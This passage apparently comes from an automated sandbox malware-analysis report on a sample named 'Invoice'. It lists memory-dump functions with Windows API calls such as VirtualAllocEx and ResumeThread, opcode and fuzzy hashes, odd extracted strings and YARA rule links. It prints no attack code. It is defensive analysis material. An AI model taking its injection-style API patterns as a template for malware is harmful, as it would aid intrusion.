Uniqueness Score: -1.00%

Function 0155B159 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0155AFB9,00000800,00000000,00000000), ref: 0155B1CA

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2400b526c8a22acc32ec14b0a7d69f329efb2ed539f8f41356c4ce9d383d5253
Instruction ID: baef2edb905f28be62a070477d83dfa3aa186a6f243b71d1ff13a2859295fd2d
Opcode Fuzzy Hash: 2400b526c8a22acc32ec14b0a7d69f329efb2ed539f8f41356c4ce9d383d5253
Instruction Fuzzy Hash: 641106B58003099FDB14CFAAC845A9EFBF5FB48310F14841AE915A7200C775A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 078AF1A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078AF20E

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2aa1043e8e118668f9c854c46eb9af12f7313311e8fba5cef8aedbaef06f755
Instruction ID: ae3b72f421aa9238d1251ea30f9915d2891714b5ae1c8dee265a6b09ad703588
Opcode Fuzzy Hash: c2aa1043e8e118668f9c854c46eb9af12f7313311e8fba5cef8aedbaef06f755
Instruction Fuzzy Hash: 091167B19002499FDB20CFAAC845BDEBFF5EF88320F248819E519A7250C775A500DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 078AEBDA Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 078AEC42

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 275d449744abec77cac7c4bf1db774f96580f8a842e0d56b4dec7866747536fe
Instruction ID: ff7dbec9138700f3003253d40a6620e029eb715874aa6c102456395b3654977c
Opcode Fuzzy Hash: 275d449744abec77cac7c4bf1db774f96580f8a842e0d56b4dec7866747536fe
Instruction Fuzzy Hash: 61115BB1D002498FDB20DFAAC4457EEFFF4EB98320F248419D519A7640CB756544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 078AEBE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 078AEC42

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 91079f716b0d9f1536a154065bd0f80502a45246981e19763d0c1b4bf542534c
Instruction ID: 43810e4ddb25969a67e0f6681f2822cec25d3d87dc3451e58c88ff9014fe6683
Opcode Fuzzy Hash: 91079f716b0d9f1536a154065bd0f80502a45246981e19763d0c1b4bf542534c
Instruction Fuzzy Hash: 1F113AB1D003498FDB20DFAAC44579EFBF5EF98324F248819D519A7240CB79A544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0155AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0155AF3E

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f196d96f6e85036b82d069008b005b2ec21dffa2f809dde543ae8580dcddd717
Instruction ID: 909a91adf9db578703df6dc0dbc405470d6acdd225d1964a848e9564f9986564
Opcode Fuzzy Hash: f196d96f6e85036b82d069008b005b2ec21dffa2f809dde543ae8580dcddd717
Instruction Fuzzy Hash: 591110B6C002498FDB10CF9AC844BDEFBF4EF88324F24851AD929A7240C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010CD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708610028.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c2dccb7d5104da15e672a2924079cf21cf6f3d18ac8f219ef5344cb477098b
Instruction ID: 63ae359124c46aafec1b4bdf84dd49c5f4e5f891cac518c33ea1c4a8addc104d
Opcode Fuzzy Hash: 83c2dccb7d5104da15e672a2924079cf21cf6f3d18ac8f219ef5344cb477098b
Instruction Fuzzy Hash: ED2102B1504200DFDB05DF48C9C0B6ABBA5FB84724F20C5ADEA490A256C736E446CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708658202.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3deeb49c59aa974eaa9d7ea76bd47cca728f97a545dacb7ebad037addf8945b
Instruction ID: b3bf05c51d6a8b9af17c0418a301057f46dc70d371ad1b18a027a8688bc0ceca
Opcode Fuzzy Hash: b3deeb49c59aa974eaa9d7ea76bd47cca728f97a545dacb7ebad037addf8945b
Instruction Fuzzy Hash: B321F1B15043009FCB15DF58D980B26BFA5EB84354F24C9A9E98A4B286C336D406CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010DD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708658202.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f9a4ece6e2bfd8d6076858eb948c52dfb83c67bc4ab3a48ec9be7844f26283
Instruction ID: a7abf5a6a3d8d000a1d1e5b8b76721c20b5c80b7ca6955accc076bd0fa243a5e
Opcode Fuzzy Hash: a0f9a4ece6e2bfd8d6076858eb948c52dfb83c67bc4ab3a48ec9be7844f26283
Instruction Fuzzy Hash: DA2104B5504300EFDB05DF98D9C0B36BBA5FB94324F24C9ADE9894B292C336D446CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708658202.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93866f6037eac5e0a5122949c9435759f35d47da6cbbd893729e5339679c8260
Instruction ID: fef6cf26f6b525903d58c130933d0c1e40c40d1e851deef2a73bdeb170cf390b
Opcode Fuzzy Hash: 93866f6037eac5e0a5122949c9435759f35d47da6cbbd893729e5339679c8260
Instruction Fuzzy Hash: 8C21C6755093808FDB13CF64D590715BFB1EB85314F28C5DAD8898B697C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 010CD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708610028.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: e572c50bd365e7a3a5d88d5ed625a3669843332221988fc01273266419b1a982
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 1511CD72404240DFDB12CF44D9C0B5ABFA2FB84224F2482ADD9494A656C33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010DD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708658202.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10dd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 2bab8dcbaf5a19db3a55715415954c1db44fb39f219e4a5a22f0e5d8999adf64
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 5711BB75504380DFDB12CF54C5C0B25BBB2FB84224F24C6AAD8894B696C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 010CD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708610028.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ffc197ca849133a510f38abb53b17b286ff9d548afc00006f0a49750d9a075
Instruction ID: 7faf87bdf7a56bc5bddfce8c460d45663824bdc8462c88e85b846fe622310901
Opcode Fuzzy Hash: b9ffc197ca849133a510f38abb53b17b286ff9d548afc00006f0a49750d9a075
Instruction Fuzzy Hash: BD01F7710043809AE7105FA9CDC4B2EBFD8EF41724F18C66EED494A282E6399840CFF1

Uniqueness

Uniqueness Score: -1.00%

Function 010CD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708610028.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c248f76c28064612123fdb8bd1fe371bc39c1be9db3422e0e506b3fc4f4f40eb
Instruction ID: 01dfeb8f7cc3b7c6d4509d354329def544715da86fa70e2d74a863d5c1a064e4
Opcode Fuzzy Hash: c248f76c28064612123fdb8bd1fe371bc39c1be9db3422e0e506b3fc4f4f40eb
Instruction Fuzzy Hash: 94F0C271404380AAEB108F1AC8C4B66FFD8EB41634F18C15AED484B286D2799844CBB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 078A5F70 Relevance: 5.3, Strings: 4, Instructions: 259COMMON

Download Yara Rule

Strings

[V~*, xrefs: 078A60DC
T+-q, xrefs: 078A62AA
]\`, xrefs: 078A61F2
[V~*, xrefs: 078A60D5

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$[V~*$]\`
API String ID: 0-1849991408
Opcode ID: 8c81c76538707943d120925a2ab0107c8892a99e480001236cd8b490a205ac08
Instruction ID: 597dd2c303d4da1f9c65cd37977315e10c56a577bf0a155758df0c12250b338a
Opcode Fuzzy Hash: 8c81c76538707943d120925a2ab0107c8892a99e480001236cd8b490a205ac08
Instruction Fuzzy Hash: 5FB1F8B0E15219EBDB04CFAAD98099EFBF2BF99304F18D52AD415FB218E73099418F54

Uniqueness

Uniqueness Score: -1.00%

Function 078A5F61 Relevance: 4.0, Strings: 3, Instructions: 259COMMON

Download Yara Rule

Strings

[V~*, xrefs: 078A60DC
T+-q, xrefs: 078A62AA
]\`, xrefs: 078A61F2

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: 1694538b87a526c539dfed72c0c10596db6ed962afffe1e4aeec480e1f673c6f
Instruction ID: 9d6b20741ef31c5656002d8c1725bc2af08b15bfe9d9576c13f7776ed2410616
Opcode Fuzzy Hash: 1694538b87a526c539dfed72c0c10596db6ed962afffe1e4aeec480e1f673c6f
Instruction Fuzzy Hash: 21B129B4E15219EBDB04CFAAD98089EFBF2BF99304F18D52AD415FB218E33099418F54

Uniqueness

Uniqueness Score: -1.00%

Function 078A0006 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

Kk, xrefs: 078A007E
Z;ya, xrefs: 078A00E3

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID: Kk$Z;ya
API String ID: 0-687208382
Opcode ID: eb5a9b6839ef21531eeb496a28f4bcc02b28980b869ea1b99737bc19c40e65d6
Instruction ID: aecf5fbfe7ec5eaf7997363fb8147d989c2a54b51954df522d15a530329b7067
Opcode Fuzzy Hash: eb5a9b6839ef21531eeb496a28f4bcc02b28980b869ea1b99737bc19c40e65d6
Instruction Fuzzy Hash: AD51B170D0A249AFDB05CFA9C5905AEFFB2EF56200F14D4AAC505EB222E7349A81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 078AC780 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb5ebddf3339160f30976453c0964a140a57329853c53225b88f83122d7cdb4
Instruction ID: 5e8d8641e1062e822d19c2e952fb616ec74eed65d30b9561eefa57b38cf3a7c2
Opcode Fuzzy Hash: 2eb5ebddf3339160f30976453c0964a140a57329853c53225b88f83122d7cdb4
Instruction Fuzzy Hash: 00E11AB4E002599FDB14DFA9C5809AEFBF2FF89304F249169D814AB355D731A982CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078AE3B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c47c3c5f6b91abb6271ac744516fa739957f67916594c9e982d5ad9c0492a62
Instruction ID: 2c2ce974f0d74b77c51dd2a619fb5e6d44eca204631116bda49916950430a983
Opcode Fuzzy Hash: 8c47c3c5f6b91abb6271ac744516fa739957f67916594c9e982d5ad9c0492a62
Instruction Fuzzy Hash: 95E129B4E002199FDB14DFA9C5819AEFBB2FF89304F249569D814AB355D730A982CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078AF260 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce343b078722bbb9d8a07cbc02dd4f3e309bbf9aa55dcb21c9683b0dc3def92
Instruction ID: a2412bfc2a7fc756ffcb48cd0fc0a759159ae29fc82221d037baedcfb2143932
Opcode Fuzzy Hash: 7ce343b078722bbb9d8a07cbc02dd4f3e309bbf9aa55dcb21c9683b0dc3def92
Instruction Fuzzy Hash: 97E10BB4E012599FDB14DFA9C5809AEFBF2FF89304F248169D914AB355D730A982CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078AED68 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5905b12f22534900de31fa809437c28fa3e626b6b29a3e7962cc9d981830e7
Instruction ID: c4323b577142794ae7349cc35ba712ca8f2931f1b0b316efcb10cee38c152d4d
Opcode Fuzzy Hash: 2e5905b12f22534900de31fa809437c28fa3e626b6b29a3e7962cc9d981830e7
Instruction Fuzzy Hash: 1EE11CB4E002599FDB14DFA9C5809AEFBF2FF89304F248169D814AB355D730A981CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078ACBB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c95840f6c173d2e8a63b8e400ded6048e4d4c8f31da396c161fd89d518b8ad8
Instruction ID: 0fc860ea48f87d8cc383c77dcea080d8036383979a243d4819cbdddd5f73df21
Opcode Fuzzy Hash: 9c95840f6c173d2e8a63b8e400ded6048e4d4c8f31da396c161fd89d518b8ad8
Instruction Fuzzy Hash: 1CE11AB4E002599FDB14DFA9C5909AEFBF2FF89304F249169D814AB355D730A982CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078A4910 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6db2fc294afef50b0cab5737213f989753b2324e13761ea14e8946a0368f5da
Instruction ID: e083c7577c8f6207177d00ee8735cec69af17f3b77cae4de2eeca00b3b079c5b
Opcode Fuzzy Hash: b6db2fc294afef50b0cab5737213f989753b2324e13761ea14e8946a0368f5da
Instruction Fuzzy Hash: 36D1E53192075ACADB15EFA4D990699B771FF95200F60DB9AE0093B225EF706AC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0155D2A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e6b222d82004b98205a2cf0ad533174f626422180eb20afa7a0d40d8b2cee8
Instruction ID: e6928fb3386d2e94e2f266eeeabce149409fd7d512c4e7a5ca4dba474690d65e
Opcode Fuzzy Hash: a6e6b222d82004b98205a2cf0ad533174f626422180eb20afa7a0d40d8b2cee8
Instruction Fuzzy Hash: 68A16E32E0021A8FCF15DFB4D85459EBBB2FF84304B1585ABE915AF265DB31E906CB40

Uniqueness

Uniqueness Score: -1.00%

Function 078A490E Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402463af48a8179bc98c0722dd5de6d52b65450f8ef224736e66561123adf210
Instruction ID: e68aac7814d7986bf01e82b3b2e143fc209d2c5ad7eb7d46b768e255733db55f
Opcode Fuzzy Hash: 402463af48a8179bc98c0722dd5de6d52b65450f8ef224736e66561123adf210
Instruction Fuzzy Hash: ECD1E435D2075ACACB15EFA4D990699B771FF95200F60DB9AE0093B225EB706AC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 078A0228 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f5fa020afd3bc4bd941186c8e749eceddb67d3c8eb7211e83b67d5d17051e5
Instruction ID: e635f87e4389e41ef3c33c8607b5feb07fbf70825b4bb157557bfc229aa12edf
Opcode Fuzzy Hash: 10f5fa020afd3bc4bd941186c8e749eceddb67d3c8eb7211e83b67d5d17051e5
Instruction Fuzzy Hash: E581F0B4E11219DFCB44CF99C5849AEFBF2FF89254F14915AD415AB320D330AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 078A0219 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865ead2f0fbf7bc310496c468a52657938454bfc2996e62e9162c774a217924a
Instruction ID: 662852e08a79bf0b02dfd13a35a3e660f3dd22a0fb1b08d61efb63311b5e397b
Opcode Fuzzy Hash: 865ead2f0fbf7bc310496c468a52657938454bfc2996e62e9162c774a217924a
Instruction Fuzzy Hash: 9A810274E11219DFCB44CFA9C584AAEBBF2FF89254F14956AD415EB320D330AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 078A1688 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6affaa5b018bb09a3ffa9e0b3506bc6e2cf72c2a44a0cf7bcd7adbe11e69721
Instruction ID: 6727ce0cced2dfc97f4cd54f07d10dd68b049359e9a9328b57850b818e4bf19c
Opcode Fuzzy Hash: b6affaa5b018bb09a3ffa9e0b3506bc6e2cf72c2a44a0cf7bcd7adbe11e69721
Instruction Fuzzy Hash: C5618EB4D6AA0DFBE704CF92E28E559BFB2FB89340F68E495C085D7154DB348664CB08

Uniqueness

Uniqueness Score: -1.00%

Function 078A300F Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5210fc8b29ef7a90e2f7f526c013ac1df36089f1fdb84cea37d7eb0a9fee2eba
Instruction ID: 3b0d788bab025a03f6639f8415028d248938f94660c70377ce2a0da62edc8be2
Opcode Fuzzy Hash: 5210fc8b29ef7a90e2f7f526c013ac1df36089f1fdb84cea37d7eb0a9fee2eba
Instruction Fuzzy Hash: 325138B4E1520AAFDB08CFE9D5415AEFBF2EB99310F20942AE415E7350D7349A42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 078A10E0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ffbd03b232f7812e3560d2e4fee4401de625a3999d77b59e1e13775021cd03
Instruction ID: 9ae667e54cd673ebb302529631e4bcbc6d02c3648325abbe0ff2602622e39a3e
Opcode Fuzzy Hash: 40ffbd03b232f7812e3560d2e4fee4401de625a3999d77b59e1e13775021cd03
Instruction Fuzzy Hash: 7D6115B4E1520EEFDB04CFA9C5859EEFBB6BB59300F14906AD425E7204D3349A41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 078A10D1 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665aef9284de86672b2c3af1bcf661454bb4f75c9a47ede186dc3f415c2c206f
Instruction ID: 642b02003c27b0d93fb636f8567cad05c279648802652149fcf69978278f5745
Opcode Fuzzy Hash: 665aef9284de86672b2c3af1bcf661454bb4f75c9a47ede186dc3f415c2c206f
Instruction Fuzzy Hash: 785147B5E1520EEFDB04CFA9C4859AEFBB6BF99200F14D466D425E7240D3349A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 078A3060 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39872207dbceb3d7f5ddafc35c0c673a2bd03382d86d7bc8b99df610dca7862a
Instruction ID: 12f9c6f8957061936a184dc99daea5914ab14369ed6cf16efe4ccbe010ac1803
Opcode Fuzzy Hash: 39872207dbceb3d7f5ddafc35c0c673a2bd03382d86d7bc8b99df610dca7862a
Instruction Fuzzy Hash: 045158B4E1520AAFDB08CFE6D5455AEBFF2EF99300F10942AE411E7250D7345A42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 078A3070 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b73cd20722a31e4ff95645ce9464083efda99d8acb8fc43035ee5251fe473e
Instruction ID: 5803cc1c0698e044de60aa0654721dca26ffa1ce2f4a88c65988cb7907c06bed
Opcode Fuzzy Hash: e2b73cd20722a31e4ff95645ce9464083efda99d8acb8fc43035ee5251fe473e
Instruction Fuzzy Hash: 195157B4E1520AEFDB08CFE6D4455AEFBF2EF99300F20942AE405E3214D7345A428F90

Uniqueness

Uniqueness Score: -1.00%

Function 078AF250 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09cbbe7de4f490a61e9501d895af11b9f9107d1d5362a8d471609b9c5a7ea4a7
Instruction ID: 510a1ac6c8a2e68e95e62fc9182c487c571f522d7183d81d7fd30edb2f209a57
Opcode Fuzzy Hash: 09cbbe7de4f490a61e9501d895af11b9f9107d1d5362a8d471609b9c5a7ea4a7
Instruction Fuzzy Hash: 6E511AB4E012198FDB14DFAAC5809AEFBF2BF89314F24C169D518AB315D7319982CF60

Uniqueness

Uniqueness Score: -1.00%

Function 078AC772 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce2e5f903ce1428ef79e0706e60f59c4ebcfc4c5908960773b02815c92ef5a6
Instruction ID: ceb13b9b838c5fe0d2ab0c81d7d30e27fc796920888dfe5a2c11095fd64e7052
Opcode Fuzzy Hash: fce2e5f903ce1428ef79e0706e60f59c4ebcfc4c5908960773b02815c92ef5a6
Instruction Fuzzy Hash: E8511CB4E052198FDB14DFAAC5809AEFBF2BF89314F24C169D418AB315D7319982CF61

Uniqueness

Uniqueness Score: -1.00%

Function 078A1441 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

